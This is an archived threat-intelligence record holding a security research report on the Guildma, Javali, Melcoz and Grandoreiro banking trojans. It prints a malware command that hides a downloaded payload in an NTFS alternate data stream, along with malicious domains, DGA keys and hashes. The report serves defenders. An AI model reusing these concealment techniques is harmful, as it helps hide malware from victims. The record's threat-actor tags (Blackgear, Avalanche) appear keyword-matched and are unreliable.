{ "id": "77b8e619-dcc7-481e-9fa5-b99d0d3bca02", "created_at": "2026-04-06T00:21:41.720124Z", "updated_at": "2026-04-10T03:35:59.518352Z", "deleted_at": null, "sha1_hash": "fd6f09453f5aba5c76dc2c38a4842e8baaedd9bb", "title": "The Tetrade: Brazilian banking malware goes global", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1107884, "plain_text": "The Tetrade: Brazilian banking malware goes global\r\nBy GReAT\r\nPublished: 2020-07-14 · Archived: 2026-04-05 18:24:13 UTC\r\nIntroduction\r\nBrazil is a well-known country with plenty of banking trojans developed by local crooks. The Brazilian criminal\r\nunderground is home to some of the world’s busiest and most creative perpetrators of cybercrime. Like their counterparts’ in\r\nChina and Russia, their cyberattacks have a strong local flavor, and for a long time, they limited their attacks to the\r\ncustomers of local banks. But the time has come when they aggressively expand their attacks and operations abroad,\r\ntargeting other countries and banks. The Tetrade is our designation for four large banking trojan families created, developed\r\nand spread by Brazilian crooks, but now on a global level.\r\nAlthough this is not their first attempt – they tried, timidly, in 2011, using very basic trojans, with a low success rate – now\r\nthe situation is completely different. Brazilian banking trojans have evolved greatly, with hackers adopting techniques for\r\nbypassing detection, creating highly modular and obfuscated malware, and using a very complex execution flow, which\r\nmakes analysis a painful, tricky process.\r\nAt least since the year 2000, Brazilian banks have operated in a very hostile online environment full of fraud. Despite their\r\nearly adoption of technologies aimed at protecting the customer, and deployment of plugins, tokens, e-tokens, two-factor\r\nauthentication, CHIP and PIN credit cards, and other ways to safeguard their millions of clients, fraud is still ramping up, as\r\nthe country still lacks proper legislation for punishing cybercriminals.\r\nThis article is a deep dive intended for a complete understanding of these four banking trojan families: Guildma, Javali,\r\nMelcoz and Grandoreiro, as they expand abroad, targeting users not just in Brazil, but in the wider Latin America and\r\nEurope.\r\nThese crooks are prepared to take on the world. Are the financial system and security analysts ready to deal with this\r\npersistent avalanche?\r\nGuildma: full of tricks\r\nAlso known as Astaroth\r\nFirst seen 2015\r\nTricks\r\nLOLBin and NTFS Alternate Data Streams (ADS), process hollowing, payloads\r\nhosted within YouTube and Facebook posts\r\nReady to steal data from\r\nvictims living in…\r\nChile, Uruguay, Peru, Ecuador, Colombia, China, Europe. Confirmed victims in\r\nBrazil\r\nThe Guildma malware has been active since at least 2015, when it was targeting banking users exclusively from Brazil.\r\nFrom there on, it has been constantly updated, adding new targets, new features and stealthiness to its campaigns, and\r\ndirecting its attacks at other countries in Latin America. The group behind the attacks have shown a good knowledge of\r\nlegitimate tools for performing a complex execution flow, pretending to hide themselves inside the host system and\r\npreventing automated analysis systems from tracking their activities.\r\nRecently, a newer version was found in-the-wild, abusing NTFS Alternate Data Streams (ADS) in order to store the content\r\nof malicious payloads downloaded during execution. The malware is highly modular, with a very complex execution flow.\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 1 of 17\n\nThe main vector used by the group is sending malicious files in compressed format, attached to email. File types vary from\r\nVBS to LNK; the most recent campaign started to attach an HTML file which executes Javascript for downloading a\r\nmalicious file.\r\nThe malware relies on anti-debugging, anti-virtualization and anti-emulation tricks, besides the usage of process hollowing,\r\nliving-off-the-land binaries (LOLBin) and NTFS Alternate Data Streams to store downloaded payloads that come from\r\ncloud hosting services such as CloudFlare’s Workers, Amazon AWS and also popular websites like YouTube and Facebook,\r\nwhere they store C2 information.\r\nFrom LNK to a full banking backdoor\r\nGuildma spreads rely heavily on email shots containing a malicious file in compressed format, attached to the email body.\r\nFile types vary from Visual Basic Script to LNK. Most of the phishing messages emulate business requests, packages sent\r\nover courier services or any other regular corporate subjects, including the COVID-19 pandemic, but always with a\r\ncorporate appearance.\r\nPurchase invoice for alcohol gel: Guildma’s trick for luring victims\r\nWe observed that in the beginning of November 2019, another layer was added to the infection chain. Instead of attaching a\r\ncompacted file directly to the email body, the attackers were attaching an HTML file which executed a Javascript for\r\ndownloading the file.\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 2 of 17\n\nJavascript executed in order to download a compressed LNK file\r\nIn order to download the additional modules, the malware uses the BITSAdmin tool, which this group has relied on for some\r\nyears to avoid detection, since this is an allowlisted tool from the Windows operating system. By the end of September\r\n2019, we started seeing a new version of Guildma malware being distributed that used a new technique for storing\r\ndownloaded payloads in NTFS Alternate Data Streams in order to conceal their presence in the system.\r\nc:\\windows\\system32\\cmd.exe /c type “c:\\users\\public\\Libraries\\radm\\koddsuffyi.gif” \u003e\r\n“c:\\users\\public\\Libraries\\radm\\desktop.ini:koddsuffyi.gif” \u0026\u0026 erase “c:\\users\\public\\Libraries\\radm\\koddsuffyi.gif”\r\nDownloaded payload being stored in desktop.ini’s ADS\r\nThe usage of ADS helps to hide the file in the system, since it will not appear in Explorer, etc. In order to see the alternate\r\ndata, you can use the “DIR” command, adding the switch “/R”, which is specifically intended for to displaying alternate data\r\nstreams.\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 3 of 17\n\nPayloads stored in the ADS data of desktop.ini\r\nAfter the additional modules are hidden, the malware will launch itself by using DLL Search Order Hijacking. We have\r\nobserved various processes being used by Guildma at this step; in this version of the malware, it uses ExtExport.exe, which\r\nis related to Internet Explorer. The library that will be loaded is the result of concatenating two files (\u003crandom\u003e64a.dll and\r\n\u003crandom\u003e64b.dll), downloaded previously, as we can see in the image above. The resultant file will be named with different\r\nknown libraries that are loaded by ExtExport on its execution. Once loaded, it will concatenate three other files and also load\r\nthem.\r\nSome of the anti-debugging/anti-emulation techniques used by the loader\r\nThis stage checks for debugging tools, virtual environments, known Windows product IDs commonly used by sandboxes,\r\ncommon usernames and certain disk serial numbers that are most likely associated with analyst environments detected\r\nearlier. If nothing like that is detected, the malware will decrypt the third stage and execute it by using the process hollowing\r\ntechnique, commonly used by malware authors. In this version, the payloads are encrypted with the same XOR-based\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 4 of 17\n\nalgorithm as the one used in previous versions, however in this latest version, the payload is encrypted twice, with different\r\nkeys.\r\nFile content is encrypted twice using different keys\r\nIn order to execute the additional modules, the malware uses the process hollowing technique for hiding the malicious\r\npayload inside an allowlisted process, such as svchost.exe. The payloads are stored encrypted in the filesystem and\r\ndecrypted in the memory as they are executed.\r\nThe final payload installed in the system will monitor user activities, such as opened websites and run applications and\r\ncheck if they are on the target list. When a target is detected, the module is executed, giving the criminals control over\r\nbanking transactions.\r\nThis module allows the criminals to perform certain very specific banking operations, such as:\r\nfull control over page navigation through the use of a VNC-like system,\r\ntoggling screen overlay,\r\nrequesting SMS tokens,\r\nQR code validation,\r\nrequesting transaction\r\nThe attacker can essentially perform any financial transactions by using the victim’s computer, while avoiding anti-fraud\r\nsystems that can detect banking transactions initiated by suspicious machines.\r\nYoutube and Facebook for C2s\r\nAfter all loading steps, the malware will run in the infected system. It will monitor the system, communicating with the C2\r\nserver and loading additional modules as requested. In the latest versions, it started to store C2 information in encrypted\r\nformat on YouTube and Facebook pages.\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 5 of 17\n\nC2 information hosted on a YouTube page\r\nThe newer versions of Guildma found in 2020 are using an automated process to generate thousands of daily URLs, mostly\r\nabusing generic TLDs. Our systems have been catching more than 200 different URLs per day, such as:\r\n01autogestor.ga ghcco980m1zy9.org\r\n04autogestor.ml gurulea8.ml\r\n0ff2mft71jarf.gq k8cf0j5u.cf\r\n2va6v.6pnc3461.ink kaligodfrey.casa\r\n4nk7h3s453b019.com.de kfgkqnf5.cf\r\n64pgrpyxpueoj.ga nfiru.xyz\r\n6pnc3461.ink osieofcorizon.fun\r\n6zs1njbw.ml paiuew.bnorp.ml\r\n7wpinibw.ml peolplefortalce.gq\r\n84m4bl423.space topgear.cf\r\n909nu3dx3rgk13.com.de venumxmasz.club\r\nbantqr8rrm9c11.com.de vuryza.ga\r\nevokgtis.gq xufa8hy15.online\r\ng2ha14u2m2xe12.com.de xvbe.monster\r\nSome of Guildma’s URLs for downloading malware\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 6 of 17\n\nOur telemetry shows detections of Guildma are widespread.\r\nGuildma: widespread globally\r\nThe intended targets of Guildma can be seen in the code: the malware is capable of stealing data from bank customers living\r\nin Chile, Uruguay, Peru, Ecuador, Colombia, China, Europe, and of course, Brazil. However, the code has been found in just\r\none version of Guildma and has not been implemented in any of the newer versions.\r\nFrom Guildma’s code: possible target countries\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 7 of 17\n\nJavali: big and furious\r\nFirst seen 2017\r\nTricks\r\nBig files for avoiding detection, DLL sideloading, configuration settings hosted in Google\r\nDocs\r\nConfirmed victims\r\nin\r\nBrazil and Mexico\r\nJavali targets Portuguese- and Spanish-speaking countries, active since November 2017 and primarily focusing on the\r\ncustomers of financial institutions located in Brazil and Mexico. Javali uses multistage malware and distributes its initial\r\npayload via phishing emails, as an attachment or link to a website. These emails include an MSI (Microsoft Installer) file\r\nwith an embedded Visual Basic Script that downloads the final malicious payload from a remote C2; it also uses DLL\r\nsideloading and several layers of obfuscation to hide its malicious activities from analysts and security solutions.\r\nThe initial Microsoft Installer downloader contains an embedded custom action that triggers a Visual Basic Script. The script\r\nconnects to a remote server and retrieves the second stage of the malware.\r\nUsing MSI’s ‘CustomAction’ events to trigger the execution of the downloader VBS\r\nThe downloaded ZIP file package contains several files and a malicious payload that is capable of stealing financial\r\ninformation from the victim. A decompressed package commonly contains a large number of files including executables that\r\nare legit but vulnerable to DLL sideloading.\r\n The contents of a typical Javali .ZIP package, including a 602 MB DLL file\r\nThe legitimate DLL that would be used in this case has the size of roughly 600 KB, but here we have an obfuscated library\r\nthat is over 600 MB. The large size of the file is intended to hamper analysis and detection. In addition to that, file size\r\nlimitations will prevent uploading to multiscanners like VirusTotal, etc. Once all empty sections have been removed from\r\nthe library, the final payload is a binary of 27.5 MB…\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 8 of 17\n\nAfter deobfuscating it all, we are able to see the URLs and the names of banks targeted by the malware.\r\nJavali after deobfuscation: looking for Mexican bank customers\r\nGDocs for malware\r\nOnce the library is called by one of the triggering events implemented in its code, it reads a configuration file from a shared\r\nGoogle Document. If it is not able to connect to the address, it uses a hardcoded one.\r\nConfiguration settings stored in a shared Google Document\r\nThe original configuration.\r\ninicio{\r\n“host”:”7FF87EF610080973F065CAB4B5B0AA”,\r\n“porta”:”0000″\r\n}fim\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 9 of 17\n\nThe host information is obfuscated for obvious reasons. Javali adopts a third-party library named IndyProject for\r\ncommunication with the C2. In the most recent campaigns, its operators started using YouTube as well for hosting C2\r\ninformation, exactly as Guildma does.\r\nUpon in-depth analysis of the library code, we can see a list of targets in some of the samples. Depending on the sample\r\nanalyzed, cryptocurrency websites, such as Bittrex, or payment solutions, such as Mercado Pago, a very popular retailer in\r\nLatin America, are also targeted. To capture login credentials from all the previously listed websites, Javali monitors\r\nprocesses to find open browsers or custom banking applications. The most common web browsers thus monitored are\r\nMozilla Firefox, Google Chrome, Internet Explorer and Microsoft Edge.\r\nThe victim distribution is mainly concentrated in Brazil, although recent phishing email demonstrates a marked interest in\r\nMexico.\r\nJavali: focus on Brazil and Mexico\r\nJavali is using allowlisted and signed binaries, Microsoft Installer files and DLL hijacking to infect victims en masse, all\r\nwhile targeting their efforts by country. This is achieved by controlling the means of distribution and sending phishing email\r\nonly to those TLDs that the group is interested in. We can expect expansion mainly across Latin America.\r\nMelcoz, a worldwide operator\r\nFirst seen 2018 (worldwide) but active in Brazil for years\r\nTricks DLL hijacking, AutoIt loaders, Bitcoin wallet stealing module\r\nConfirmed victims in Brazil, Chile, Mexico, Spain, Portugal\r\nMelcoz is a banking trojan family developed by a group that has been active in Brazil for years, but at least since 2018, has\r\nexpanded overseas. Their Eastern European partners heavily inspired the recent attacks. The new operations are\r\nprofessionally executed, scalable and persistent, creating various versions of the malware, with significant infrastructure\r\nimprovements that enable cybercriminal groups in different countries to collaborate.\r\nWe found that the group has attacked assets in Chile since 2018 and more recently, in Mexico. Still, it is highly probable\r\nthere are victims in other countries, as some of the targeted banks operate internationally. However, the attacks seem to be\r\nfocused more on Latin American victims these days. As these groups speak different languages (Portuguese and Spanish),\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 10 of 17\n\nwe believe that Brazilian cybercriminals are working with local groups of coders and mules to withdraw stolen money,\r\nmanaged by different operators, selling access to its infrastructure and malware constructors. Each campaign runs on its\r\nunique ID, which varies between versions and CnCs used.\r\nGenerally, the malware uses AutoIt or VBS scripts added into MSI files, which run malicious DLLs using the DLL-Hijack\r\ntechnique, aiming to bypass security solutions. The malware steals passwords from browsers and the memory, providing\r\nremote access for capturing online banking access. It also includes a module for stealing Bitcoin wallets. It replaces the\r\noriginal wallet information with the cybercriminals’ own.\r\nYet Another Son of Remote Access PC\r\nMelcoz is another customization of the well-known open-source RAT Remote Access PC, which is available on GitHub, as\r\nwell as many other versions developed by Brazilian criminals. It first started targeting users in Brazil, but since at least 2018,\r\nthe group has shown interest in other countries, such as Chile and Mexico. The infection vector used in this attack is\r\nphishing email that contains a link to a downloadable MSI installer, as shown below.\r\nPhishing email written in Spanish\r\nAlmost all of the analyzed MSI samples used some version of Advanced Installer with a VBS script appended to the\r\nCustomAction section, which makes the script run during the installation process. The script itself works as a downloader\r\nfor additional files needed for loading the malware into the system, which are hosted separately as a ZIP package. We\r\nconfirmed two different techniques used for distributing the Melcoz backdoor: the AutoIt loader script and DLL Hijack.\r\nThe official AutoIt3 interpreter comes as part of the AutoIt installation package, and it is used by the malware to execute the\r\ncompiled script. The VBS script runs the AutoIt interpreter, passing the compiled script as an argument. Once executed, it\r\nloads the library, which was also passed as an argument to call a hardcoded exported function.\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 11 of 17\n\nAutoIt script acting as a loader for the malicious DLL\r\nThe other method used to execute the second stage in the victim’s system is DLL Hijacking. In this campaign, we have seen\r\nvmnat.exe, the legitimate VMware NAT service executable, abused for loading the malicious payload, although the group\r\ncan use a number of legit executables in their attacks.\r\nThe malware has specific features that allow the attackers to perform operations related to online banking transactions,\r\npassword stealing and clipboard monitoring. We also found various versions of the payload: the version focused on stealing\r\ndata from victims in Brazil is typically unpacked, while the versions targeting banks in Chile and Mexico are packed with\r\nVMProtect or Themida. For us, this is another flag that the operators can change their tactics in accordance with their local\r\nneeds.\r\nAfter initialization, the code monitors browser activities, looking for online banking sessions. Once these are found, the\r\nmalware enables the attacker to display an overlay window in front of the victim’s browser to manipulate the user’s session\r\nin the background. In this way, the fraudulent transaction is performed from the victim’s machine, making it harder to detect\r\nfor anti-fraud solutions on the bank’s end. The criminal can also request specific information, asked during the bank\r\ntransaction, such as a secondary password and token, bypassing two-factor authentication solutions adopted by the financial\r\nsector.\r\nThe code also has a timer that monitors content saved to the clipboard. Once a match is triggered, the malware checks if\r\nthere is a Bitcoin wallet and then replaces it with the cybercriminal’s wallet.\r\nThe attackers rely on a compromised legitimate server, as well as commercial servers they purchased. The compromised\r\nservers mostly host samples for attacking victims, whereas the commercial hosting is for C2 server communications. As\r\nmentioned earlier, different operators run different campaigns. This explains the different network infrastructures seen so far.\r\nAccording to our telemetry, Melcoz samples have been detected in other Latin American countries and in Europe, mainly in\r\nSpain and Portugal.\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 12 of 17\n\nMelcoz detections worldwide: focus on Brazil, Chile, Spain and Portugal\r\nEl Gran Grandoreiro\r\nFirst seen 2016\r\nTricks MaaS, DGA, C2 information stored on Google Sites\r\nConfirmed victims in Brazil, Mexico, Portugal, Spain\r\nJust like Melcoz and Javali, Grandoreiro started to expand its attacks in Latin American and later in Europe with great\r\nsuccess, focusing its efforts on evading detection by using modular installers. Among the four families we described,\r\nGrandoreiro is the most widespread globally. The malware enables attackers to perform fraudulent banking transactions by\r\nusing the victims’ computers for bypassing security measures used by banking institutions.\r\nWe have observed this campaign since at least 2016, with the attackers improving their techniques regularly, aiming to stay\r\nunmonitored and active longer. The malware uses a specific Domain Generation Algorithm (DGA) for hiding the C2 address\r\nused during the attack: this is one of the key points that has helped in the campaign’s clustering.\r\nIt is still not possible to link this malware to any specific cybercrime group, although it is clear that the campaign is using a\r\nMaaS (Malware-as-a-Service) business model, based on the information collected during the analysis that showed many\r\noperators were involved.\r\nWhile tracking of cybercrime campaigns that targeted Latin America, we found one interesting attack that was very similar\r\nto known Brazilian banking malware, but had distinctive features relating to the infection vector and the code itself. It was\r\npossible to identify two clusters of attacks, the first one targeting Brazilian banks and the second one aimed at other banks in\r\nLatin America and Europe. This is to be expected: many European banks have operations and branches in Latin America, so\r\nthis is a natural next step for the cybercriminals.\r\nThe cluster targeting Brazil used hacked websites and Google Ads to drive users to download the malicious installer. The\r\ncampaign targeting other countries used spear-phishing as the delivery method.\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 13 of 17\n\nFake page driving the user to download the malicious payload\r\nIn most cases, the MSI file executed a function from the embedded DLL, but there were also other cases where a VBS script\r\nwas used in place of the DLL.\r\nMSI containing an action to execute a specific function from the DLL\r\nThe function will then download an encrypted file containing the final payload used in the campaign. The file is encrypted\r\nwith a custom XOR-based algorithm, with the key 0x0AE2. In the latest versions, the authors moved from encryption to\r\nusing a base64-encoded ZIP file.\r\nThe main module is in charge of monitoring all browser activity, looking for any actions related to online banking. As we\r\nanalyzed the campaign, we identified two clusters of activity: the first one mainly focused on Brazilian targets and the\r\nsecond one focused more on international targets.\r\nThe code suggests that the campaign is being managed by various operators. The sample build specifies an operator ID,\r\nwhich will be used for select a C2 server to contact.\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 14 of 17\n\nCode used to generate the URL based on the operator ID\r\nThe code above will calculate the path to a Google Sites page containing information about the C2 server to be used by the\r\nmalware. The algorithm uses a key that is specific to the user as well as the current date, which means that the URL will\r\nchange daily.\r\nID Operator Key Date\r\nGenerated\r\npath\r\n01 zemad jkABCDEefghiHIa4567JKLMN3UVWpqrst2Z89PQRSTbuvwxyzXYFG01cdOlmno 16Mar0 zemadhjui3\r\n02 rici jkABCDEefghFG01cdOlmnopqrst2Z89PQRiHIa4567JKLMN3UVWXYSTbuvwxyz 16Mar0 ricigms0rqf\r\n03 breza 01cdOlmnopqrst2Z89PQRSTbuvwxjkABCDEefghiHIa4567JKLMN3UVWXYFGyz 16Mar0 brezasqvtub\r\n04 grl2 mDEefghiHIa4567JKLMNnopqrst2Z89PQRSTbuv01cdOlwxjkABC3UVWXYFGyz 16Mar0 grl25ns6rqh\r\n05 rox2 567JKLMNnopqrst2Z89PQmDEefghiHIa4RSTbuv01cdOlwxjkABC3UVWXYFGyz 16Mar0 rox2rpfseen\r\n06 mrb 567JKLMNnopqrst2Z89PQmDEefghiHIa4RSTbuv01cdOlwxjkABC3UVWXYFGyz 16Mar0 mrbrpfseen\r\n07 ER jkABCDEefghiHIa4567JKLMN3UVWXYFG01cdOlmnopqrst2Z89PQRSTbuvwxyz 16Mar0 erhjui3nf8\r\nThe generated path will then be contacted in order to get information about the C2 server to be used for execution.\r\nC2 information stored on Google Sites\r\nThe operator controls infected machines by using a custom tool. The tool will notify the operator when the victim is\r\navailable and enable the operator to perform a number of activities on the machine, such as:\r\nrequesting information needed for the banking transaction, such as an SMS token or QR code;\r\nallowing full remote access to the machine;\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 15 of 17\n\nblocking access to the bank website: this feature helps to prevent the victim from learning that funds were transferred\r\nfrom their account.\r\nDGA and Google sites\r\nThe campaign uses commercial hosting sites in its attacks. In many cases, they use a very specific Web server named HFS,\r\nor HTTP File Server for hosting encrypted payloads. One can note a small change on the displayed page that helps to show\r\n“Infects” instead of “Hits” as used on the default page.\r\n HFS used for hosting the encrypted payloads\r\nThose hosting sites are disposable. Each is used for a short time before the operators move on to another server. We have\r\nseen Grandoreiro use DGA functions to generate a connection to a Google Sites page storing C2 information.\r\nAs for the victims, it is possible to confirm by analyzing samples that the campaign targets Brazil, Mexico, Spain and\r\nPortugal. However, it is highly possible that other countries are also victims since the targeted institutions have operations in\r\nother countries as well.\r\nGrandoreiro: focus on Brazil, Portugal and Spain\r\nConclusions\r\nGuildma, Javali, Melcoz and Grandoreiro are examples of yet another Brazilian banking group/operation that has decided to\r\nexpand its attacks abroad, targeting banks in other countries. They benefit from the fact that many banks operating in Brazil\r\nalso have operations elsewhere in Latin America and Europe, making it easy to extend their attacks against customers of\r\nthese financial institutions.\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 16 of 17\n\nBrazilian crooks are rapidly creating an ecosystem of affiliates, recruiting cybercriminals to work with in other countries,\r\nadopting MaaS (malware-as-a-service) and quickly adding new techniques to their malware as a way to keep it relevant and\r\nfinancially attractive to their partners. They are certainly leading the creation of this type of threats in Latin America, mainly\r\nbecause they need local partners to manage the stolen money and to help with translation, as most of them are not native in\r\nSpanish. This professional approach draws a lot of inspiration from ZeuS, SpyEye and other big banking trojans of the past.\r\nAs a threat, these banking trojan families try to innovate by using DGA, encrypted payloads, process hollowing, DLL\r\nhijacking, a lot of LoLBins, fileless infections and other tricks as a way of obstructing analysis and detection. We believe\r\nthat these threats will evolve to target more banks in more countries. We know they are not the only ones doing this, as other\r\nfamilies of the same origin have already made a similar transition, possibly inspired by the success of their “competitors”.\r\nThis seems to be a trend among Brazilian malware developers that is here to stay.\r\nWe recommend that financial institutions watch these threats closely, while improving their authentication processes,\r\nboosting anti-fraud technology and threat intel data, and trying to understand and mitigate such risks. All the details, IoCs,\r\nYara rules and hashes of these threats are available to the users of our Financial Threat Intel services.\r\nMD5\r\nGuildma\r\n0219ef20ab2df29b9b29f8407cf74f1c\r\n0931a26d44f0e7d70fda9ef86ee203f4\r\nJavali\r\n5ce1eb8065acad5b59288b5662936f5d\r\n91b271e7bfe64566de562a8dd2145ac6\r\nMelcoz\r\n4194162fe30a3dca6d8568e72c71ed2d\r\naeaf7355604685d4d753d21902ff1c1c\r\nc63b4eb3067d8cb5f2d576bc0777e87d\r\nGrandoreiro\r\n071d3d6404826c24188dc37872224b3d\r\n1b50b1e375244ce5d4e690cf0dbc96d8\r\nSource: https://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MITRE" ], "references": [ "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/" ], "report_names": [ "97779" ], "threat_actors": [ { "id": "ad59becc-29c2-4b7a-a958-d7f242d222ea", "created_at": "2023-01-06T13:46:38.956494Z", "updated_at": "2026-04-10T02:00:03.161471Z", "deleted_at": null, "main_name": "Blackgear", "aliases": [ "BLACKGEAR", "Topgear", "Comnie" ], "source_name": "MISPGALAXY:Blackgear", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6750d709-9153-4e90-baa3-04883a9b762b", "created_at": "2022-10-25T16:07:23.397596Z", "updated_at": "2026-04-10T02:00:04.580074Z", "deleted_at": null, "main_name": "Blackgear", "aliases": [ "Topgear" ], "source_name": "ETDA:Blackgear", "tools": [ "Comnie", "Elirks", "Protux" ], "source_id": "ETDA", "reports": null }, { "id": "bc289ba8-bc61-474c-8462-a3f7179d97bb", "created_at": "2022-10-25T16:07:24.450609Z", "updated_at": "2026-04-10T02:00:04.996582Z", "deleted_at": null, "main_name": "Avalanche", "aliases": [], "source_name": "ETDA:Avalanche", "tools": [], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434901, "ts_updated_at": 1775792159, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/fd6f09453f5aba5c76dc2c38a4842e8baaedd9bb.pdf", "text": "https://archive.orkl.eu/fd6f09453f5aba5c76dc2c38a4842e8baaedd9bb.txt", "img": "https://archive.orkl.eu/fd6f09453f5aba5c76dc2c38a4842e8baaedd9bb.jpg" } }